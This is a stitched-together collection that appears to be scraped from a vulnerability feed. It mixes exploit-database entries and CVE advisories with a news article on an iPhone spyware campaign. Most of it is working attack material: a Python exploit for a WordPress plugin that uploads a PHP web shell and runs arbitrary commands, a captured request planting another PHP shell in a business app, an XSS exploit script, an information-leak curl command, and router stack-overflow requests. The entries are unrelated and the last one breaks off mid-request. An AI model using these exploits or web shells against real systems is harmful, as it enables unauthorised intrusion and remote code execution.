File Manager Advanced Shortcode version 2.3.2 suffers from a remote code execution vulnerability.

    # Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)# Date: 05/31/2023# Exploit Author: Mateus Machado Tesser# Vendor Homepage: https://advancedfilemanager.com/# Version: File Manager Advanced Shortcode 2.3.2# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15# CVE: CVE-2023-2068import requestsimport jsonimport pprintimport sysimport rePROCESS = "\033[1;34;40m[*]\033[0m"SUCCESS = "\033[1;32;40m[+]\033[0m"FAIL = "\033[1;31;40m[-]\033[0m"try:  COMMAND = sys.argv[2]  IP = sys.argv[1]  if len(COMMAND) > 1:    pass  if IP:    pass  else:    print(f'Use: {sys.argv[0]} IP COMMAND')except:  passurl = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panelprint(f"{PROCESS} Searching fmakey")try:  r = requests.get(url)  raw_fmakey = r.text  fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1]  if len(fmakey) == 0:    print(f"{FAIL} Cannot found fmakey!")except:  print(f"{FAIL} Cannot found fmakey!")print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')url = "http://"+IP+"/wp-admin/admin-ajax.php"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"r = requests.post(url, headers=headers, data=data)print(f"{PROCESS} Sending AJAX request to: {url}")if 'errUploadMime' in r.text:  print(f'{FAIL} Exploit failed!')  sys.exit()elif r.headers['Content-Type'].startswith("text/html"):  print(f'{FAIL} Exploit failed! Try to change _fmakey')  sys.exit(0)else:  print(f'{SUCCESS} Exploit executed with success!')exploited = json.loads(r.text)url = ""print(f'{PROCESS} Getting URL with webshell')for i in exploited["added"]:  url = i['url']print(f"{PROCESS} Executing '{COMMAND}'")r = requests.get(url+'?cmd='+COMMAND)print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)

File Manager Advanced Shortcode 2.3.2 Remote Code Execution

emoncms v11 and later was discovered to contain an information disclosure vulnerability which allows attackers to obtain the web directory path and other information leaked by the server via a crafted web request.

emoncms 11 and later version suffers from an information leakage vulnerability. An unauthorized attacker can obtain the web directory path and other information leaked by the server by constructing a special http request.

    curl 'http{s}://{IP}:{PORT}/user/login.json' -X POST -i   -H 'Content-Type: application/x-www-form-urlencoded' -H 'Accept: text/plain, */*; q=0.01' -H 'X-Requested-With: XMLHttpRequest' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36' -H 'Host: {IP}:{PORT}' -H 'Connection: Keep-alive'  -d 'password%5B%5D=1&referrer=&rememberme=1&username=1'

CVE-2023-33518: A bug leaked server web directory and other information · Issue #1856 · emoncms/emoncms

Incorrect Authorization vulnerability in Mobatime web application allows Privilege Escalation, Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Mobatime web application: through 06.7.22.



This walkthrough presents another vulnerability discovered on the Mobatime web application (see CVE-2023-3032, same version 06.7.2022 affected). This vulnerability allows an authenticated user to impersonate another one, possibly having more privileges.

This application is essentially a single page, and the pieces of information are retrieved through AJAX calls. To get adequate pieces of information, the requests carry the user identifier, in order to fetch data related to them. The issue is that this identifier is controlled by the user, and the request body is not protected. It is therefore possible to change this identifier, and impersonate someone else.

A typical AJAX call is as follows:

    POST /Webengine/api/ajax_api.aspx HTTP/1.1 Accept: */*
    Accept-Encoding: gzip, deflate, br
    ... snipped ...
    Sec-GPC: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0
    Safari/537.36 X-Requested-With: XMLHttpRequest
    
    @64eyJhcnJheV9pbnQiOltdLCJmdW5jdGlvbiI6NTA3LCJpcGFyYW0xIjoxNTQsImlwYX
    JhbTEwIjowLCJpcGFyYW0xMSI6MCwiaXBhcmFtMTIiOjAsImlwYXJhbTEzIjowLCJpcGF
    yYW0xNCI6MCwiaXBhcmFtMTUiOjAsImlwYXJhbTIiOjg0MTUsImlwYXJhbTMiOjAsImlw
    YXJhbTQiOjAsImlwYXJhbTUiOjAsImlwYXJhbTYiOjAsImlwYXJhbTciOjAsImlwYXJhb
    TgiOjAsImlwYXJhbTkiOjAsImxwYXJhbTEiOjAsInBhcmFtMSI6IiIsInBhcmFtMiI6Ii
    IsInBhcmFtMyI6IiIsInBhcmFtNCI6IiIsInBhcmFtNSI6IiIsInRva2VuIjowfQ==
    

One can recognise here a base64-encoded JSON (prefix eyJ), which gives us, once decoded:

    {
        "array_int":[],
        "function":507,
        "iparam1":154,
        "iparam10":0,
        "iparam11":0,
        "iparam12":0,
        "iparam13":0,
        "iparam14":0,
        "iparam15":0,
        "iparam2":8415,
        "iparam3":0,
        "iparam4":0,
        "iparam5":0,
        "iparam6":0,
        "iparam7":0,
        "iparam8":0,
        "iparam9":0,
        "lparam1":0,
        "param1":"",
        "param2":"","
        param3":"",
        "param4":"",
        "param5":"",
        "token":0
    }
    

Now, let’s assume that our ID is 154, and that we want to impersonate 155. Keen eye may see that the payload is not signed, hence forgeable. Since the application is a singe page, it was likely that this value 154 was carried by a JS variable, and that we could change it in a single place. All subsequent AJAX calls would probably embed the modified ID, and make us act as 155.

**Hunting the identifier**

Analysing the traffic reveals that the AJAX requests originate from a call to the routine Get in the file MobaBridge3.js. One can suppose here that this routine probably deals with the JSON payload so as to authenticated the request:

A breakpoint was therefore put at line 1’316, before the function end. Refreshing the page reveals that the attribute this._param holds the value 154. It comes from the second argument (param). Since the value 154 was already known there, one can step over LaunchThread to get back to the calling routine ($ctor1).

In this routine, a call to Get is indeed performed, and the second argument containing the identifier is referred to as s. The variable s is obtained thanks to a call to JsonConvert.SerializeObject, hence was likely to be built based on the variable function (line 17). The latter is passed as argument (line 13), and to analyse it, one should once again climb up the calling stack.

The caller lies in the class MensualView.cs, where the func variable is initialised (passed as function). It is worth noting that one of the attributes of func is named iparam1, just like the attribute carrying the identifier in the JSON stream. Its value is held by the attribute Workflow.pid. By looking where such variable is set thanks to a regular expression, only two results are returned. One of them lies on the class LoginLinkWorkflow.cs

By putting a breakpoint at line 139 and refreshing the page, the breakpoint is hit. The value of the variable PId could be turn into 155, and letting the execution flow continue normally, and the page would be rendered as if we were 155.

**Conclusion**

Since only the advertised identifier seems to be used to verify the authorisations, a malicious user could trick the application into thinking that they are someone else by changing their ID on the client side. Since the server trusts this ID, they would serve inappropriate content. The server should use server-side variables to store the ID of a user, based on a session identifier. An alternative could make use of signed JWTs to make them inalterable.

*   **2023** 6
*   **2020** 12

**2023**

**CVE-2023-3033**

3 minute read

This walkthrough presents another vulnerability discovered on the Mobatime web application (see CVE-2023-3032, same version 06.7.2022 affected). This vulnera...

**CVE-2023-3032**

less than 1 minute read

Mobatime offers various time-related products, such as check-in solutions. In versions up to 06.7.2022, an arbitrary file upload allowed an authenticated use...

**CVE-2023-3031**

less than 1 minute read

King-Avis is a Prestashop module developed by Webbax. In versions older than 17.3.15, the latter suffers from an authenticated path traversal, leading to loc...

**FuckFastCGI made simpler**

3 minute read

Let’s render unto Caesar the things that are Caesar’s, the exploit FuckFastCGI is not mine and is a brilliant one, bypassing open\_basedir and disable\_functio...

**PHP .user.ini risks**

4 minute read

I have to admit, PHP is not my favourite, but such powerful language sometimes really amazes me. Two days ago, I found a bypass of the directive open\_basedir...

**PHP open\_basedir bypass**

3 minute read

PHP is a really powerful language, and as a wise man once said, with great power comes great responsibilities. There is nothing more frustrating than obtaini...

Back to Top ↑

**2020**

**Self modifying C program - Polymorphic**

17 minute read

A few weeks ago, a good friend of mine asked me if it was possible to create such a program, as it could modify itself. After some thoughts, I answered that ...

Back to Top ↑

CVE-2023-3033: CVE-2023-3033

On the same day, Russia’s FSB intelligence service launched wild claims of NSA and Apple hacking thousands of Russians.

The Moscow-based cybersecurity firm Kaspersky has made headlines for years by exposing sophisticated hacking by Russian and Western state-sponsored cyberspies alike. Now it’s exposing a stealthy new intrusion campaign where Kaspersky itself was a target.

In a report published today, Kaspersky said that at the beginning of the year, it detected targeted attacks against a group of iPhones after analyzing the company’s own corporate network traffic. The campaign, which the researchers call Operation Triangulation and say is “ongoing,” appears to date back to 2019 and utilized multiple vulnerabilities in Apple’s iOS mobile operating system to let attackers take control of victim devices.

Kaspersky says the attack chain utilized “zero-click” exploitation to compromise targets’ devices by simply sending a specially crafted message to victims over Apple’s iMessage service. Victims received the message, which included a malicious attachment, and exploitation would begin whether victims opened the message and inspected the attachment or not. Then the attack would chain together multiple vulnerabilities to give the hackers deeper and deeper access to the target’s device. And the final malware payload would automatically download to the victim’s device before the original malicious message and attachment self-deleted.

Kaspersky’s revelation of the new iOS hacking campaign comes on the same day that Russia’s FSB intelligence service separately announced a claim that the US National Security Agency has hacked thousands of Russians’ phones. Even more remarkably, the FSB claimed that Apple had participated in that broad hacking of iOS devices, willingly providing vulnerabilities to the NSA to exploit in its spying operations.

Apple said in a statement to WIRED, “We have never worked with any government to insert a backdoor into any Apple product and never will.”

When asked about Kaspersky’s report, an Apple spokesperson noted that the findings only appear to pertain to iPhones running iOS version 15.7 and below. The current version of iOS is 16.5.

Kaspersky says that the malware it discovered cannot persist on a device once it is rebooted, but the researchers say they saw evidence of reinfection in some cases. The exact nature of the vulnerabilities used in the exploit chain remains unclear, though Kaspersky says that one of the flaws was likely the kernel extension vulnerability CVE-2022-46690 that Apple patched in December. 

Zero-click vulnerabilities can exist on any platform, but in recent years, attackers and spyware vendors have focused on finding these flaws in Apple’s iOS, often in iMessage, and exploiting them to launch targeted attacks on iPhones. This is partly because services like iMessage present unusually fertile ground within iOS for discovering vulnerabilities, but also because attacks on iOS devices with this approach are often very difficult for victims to detect.

“Kaspersky, arguably one of the best exploit detection companies in the world, was potentially hacked via an iOS zero-day for five years, and it was only discovered now,” says longtime macOS and iOS security researcher Patrick Wardle. “That shows how ridiculously hard it is to detect these exploits and attacks.”

In their report, the Kaspersky researchers point out that one of the reasons for this difficulty is iOS’s locked-down design, which makes it very tough to inspect the operating system’s activity.

“The security of iOS, once breached, makes it really challenging to detect these attacks,” says Wardle, who was formerly an NSA staffer. At the same time, he adds that attackers would need to assume any brazen campaign to target Kaspersky would eventually be discovered. “In my opinion, this would be sloppy for an NSA attack,” he says. “But it shows that either hacking Kaspersky was incredibly valuable for the attacker or that whoever this was likely has other iOS zero days as well. If you only have one exploit, you’re not going to risk your only iOS remote attack to hack Kaspersky.”

The NSA declined WIRED’s request for comment on either the FSB announcement or Kaspersky’s findings.

With the release of iOS 16 in September 2022, Apple introduced a special security setting for the mobile operating system known as Lockdown Mode that intentionally restricts usability and access to features that can be porous within services like iMessage and Apple’s WebKit. It is not known whether Lockdown Mode would have prevented the attacks Kaspersky observed.

The Russian government’s purported discovery of Apple’s collusion with US intelligence “testifies to the close cooperation of the American company Apple with the national intelligence community, in particular the US NSA, and confirms that the declared policy of ensuring the confidentiality of personal data of users of Apple devices is not true,” claims an FSB statement, which adds that it would allow the NSA and “partners in anti-Russian activities” to target “any person of interest to the White House,” as well as US citizens.

The FSB statement wasn’t accompanied by any technical details of the described NSA spy campaign, or any evidence that Apple colluded in it.

Apple has historically resisted pressure to provide a “backdoor” or other vulnerability to US law enforcement or intelligence agencies. That stance was demonstrated most publicly in Apple’s high-profile 2016 showdown with the FBI over the bureau’s demand that Apple assist in the decryption of an iPhone used by San Bernadino mass shooter Syed Rizwan Farook. The standoff only ended when the FBI found its own method of accessing the iPhone’s storage with the help of Australian cybersecurity firm Azimuth.

Despite its announcement coming on the same day as the FSB’s claims, Kaspersky has so far made no claims that the Operation Triangulation hackers who targeted the company were working on behalf of the NSA. Nor has the cybersecurity firm attributed the hacking to the Equation Group, Kaspersky’s name for the state-sponsored hackers it has previously tied to highly sophisticated malware, including Stuxnet and Duqu, tools widely believed to have been created and deployed by the NSA and US allies.

Kaspersky did say in a statement to WIRED that, “Given the sophistication of the cyberespionage campaign and the complexity of analysis of the iOS platform, further research will surely reveal more details on the matter.”

US intelligence agencies and US allies would, of course, have plenty of reason to want to look over Kaspersky’s shoulder. Aside from years of warnings from the US government that Kaspersky has ties to the Russian government, the company’s researchers have long demonstrated their willingness to track and expose hacking campaigns conducted by Western governments that Western cybersecurity firms don’t. In 2015, in fact, Kaspersky revealed that its own network had been breached by hackers who used a variant of the Duqu malware, suggesting a link to the Equation Group—and thus potentially the NSA.

That history, combined with the sophistication of the malware that targeted Kaspersky, suggests that as wild as the FSB’s claims may be, there’s good reason to imagine that Kaspersky’s intruders could have ties to a government. But if you hack one of the world’s most prolific trackers of state-sponsored hackers—even with seamless, tough-to-detect iPhone malware—you can expect, sooner or later, to get caught.

Kaspersky Says New Zero-Day Malware Hit iPhones—Including Its Own

Online Security Guards Hiring System version 1.0 suffers from a cross site scripting vulnerability.

    #Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS #Google Dork : NA#Date: 23-01-2023#Exploit Author : AFFAN AHMED#Vendor Homepage: https://phpgurukul.com#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip#Version: 1.0#Tested on: Windows 11 + XAMPP + PYTHON-3.X#CVE : CVE-2023-0527#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT# Below code check for both the parameter /admin-profile.php and in /search.php#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.mdimport requests import re from colorama import Foreprint(Fore.YELLOW + "######################################################################" + Fore.RESET)print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)print(Fore.YELLOW +"######################################################################" + Fore.RESET)print()print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET)print()# NAVIGATING TO ADMIN LOGIN PAGEWebsite_url = "http://localhost/osghs/admin/login.php"    # CHANGE THE URL ACCORDING TO YOUR SETUPprint(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET)Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}headers = {    'Content-Type': 'application/x-www-form-urlencoded',    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',    'Referer': 'http://localhost/osghs/admin/login.php',    'Accept-Encoding': 'gzip, deflate',    'Accept-Language': 'en-US,en;q=0.9',    'Connection': 'close',    'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',    'Sec-Fetch-Site': 'same-origin',    'Sec-Fetch-Mode': 'navigate',    'Sec-Fetch-User': '?1',    'Sec-Fetch-Dest': 'document'}response = requests.request("POST", Website_url, headers=headers, data = Admin_login_credentials)if response.status_code == 200:    location = re.findall(r'document.location =\'(.*?)\'',response.text)    if location:        print(Fore.GREEN + "> Login Successful into Admin Account"+Fore.RESET)        print(Fore.GREEN + "> Popup:"+ Fore.RESET,location )    else:        print(Fore.GREEN + "> document.location not found"+ Fore.RESET)else:    print(Fore.GREEN + "> Error:", response.status_code + Fore.RESET)print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter  [**]" + Fore.RESET)# NAVIGATING TO ADMIN PROFILE SECTION  TO UPDATE ADMIN PROFILE # INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETERWebsite_url= "http://localhost/osghs/admin/admin-profile.php"   # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""payload = {    "adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>",      # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE    "username": "admin",                                                      # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE    "mobilenumber": "8979555558",    "email": "admin@gmail.com",    "submit": "",}# SENDING THE RESPONSE WITH POST REQUESTresponse = requests.post(Website_url, headers=headers, data=payload)print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)# CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX if response.status_code == 200:    scripts = re.findall(r'<script>alert$.*?$</script>', response.text)    print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET)     print(Fore.GREEN+">"+Fore.RESET,scripts)exploit.pyDisplaying exploit.py.

Online Security Guards Hiring System 1.0 Cross Site Scripting

Bumsys Business Management System version 1.0.3-beta suffers from a remote shell upload vulnerability.

Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload  
Google Dork : NA  
Date: 19-01-2023  
Exploit Author: AFFAN AHMED  
Vendor Homepage: https://github.com/unilogies/bumsys  
Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip  
Version: 1.0.3-beta  
Tested on: Windows 11, XAMPP-8.2.0  
CVE : CVE-2023-0455

================================  
Steps_TO_Reproduce  
================================  
- Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/)  
- Click on action button to edit the Profile  
- Click on select logo button to upload the image  
- Intercept the POST Request  and do the below changes .

================================================================  
Burpsuite-Request  
================================================================  
POST /xhr/?module=settings&page=updateShop HTTP/1.1  
Host: demo.bumsys.org  
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7  
Content-Length: 1280  
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"  
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA  
Accept: */*  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://demo.bumsys.org  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.bumsys.org/settings/shop-list/  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopName"

TEST  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopAddress"

 test   
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopCity"

testcity  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopState"

teststate  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopPostalCode"

700056  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopCountry"

testIND  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopPhone"

895623122  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopEmail"

test@gmail.com  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopInvoiceFooter"

 ------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"  
Content-Type: image/png

<?php echo system($_REQUEST['dx']); ?>

====================================================================================  
Burpsuite-Response  
====================================================================================  
HTTP/1.1 200 OK  
Date: Thu, 19 Jan 2023 07:14:26 GMT  
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips  
X-Powered-By: PHP/7.0.33  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 65

<div class='alert alert-success'>Shop successfully updated.</div>

====================================================================================

VIDEO-POC : https://youtu.be/nwxIoSlyllQ

Bumsys Business Management System 1.0.3-beta Shell Upload

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the Edit_BasicSSID interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the Edit\_BasicSSID interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the Edit\_BasicSSID interface at /goform/aspForm. ## Vulnerability Details !\[\](https://hackmd.io/\_uploads/Bk4CQusE3.png) In the Edit\_BasicSSID function, local variable v32 is 64 bytes long. !\[\](https://hackmd.io/\_uploads/HkxTRm\_s4h.png) V31 can be controlled by attacker, entered as parameter 'param'. In line 51, v31 is formatted into v32 by function sscanf as long as the size of the data we enter until ';' without filtering or checking length. So when the size of the data we enter before ';' is larger than 64 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://hackmd.io/\_uploads/H1dtUui4h.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 602 CMD=Edit\_BasicSSID&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://hackmd.io/\_uploads/H1Ni8dsV3.png) And you can write your own exp to get the root shell.

CVE-2023-33642: H3C Magic R300-2100M was discovered stack overflow via the Edit_BasicSSID interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the AddWlanMacList interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the AddWlanMacList interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the AddWlanMacList interface at /goform/aspForm. ## Vulnerability Details !\[\](https://hackmd.io/\_uploads/ry9T-do4n.png) In the AddWlanMacList function, local variable v5 and v6 are both 32 bytes long. !\[\](https://hackmd.io/\_uploads/rkfRZui4n.png) V3 can be controlled by attacker, entered as parameter 'param'. In line 30, v3 is formatted into v5,v6 by function sscanf. So when the size of the data we enter between the first and second ';'(or the second and the third) is larger than 32 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://hackmd.io/\_uploads/rJxnzOj4h.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 608 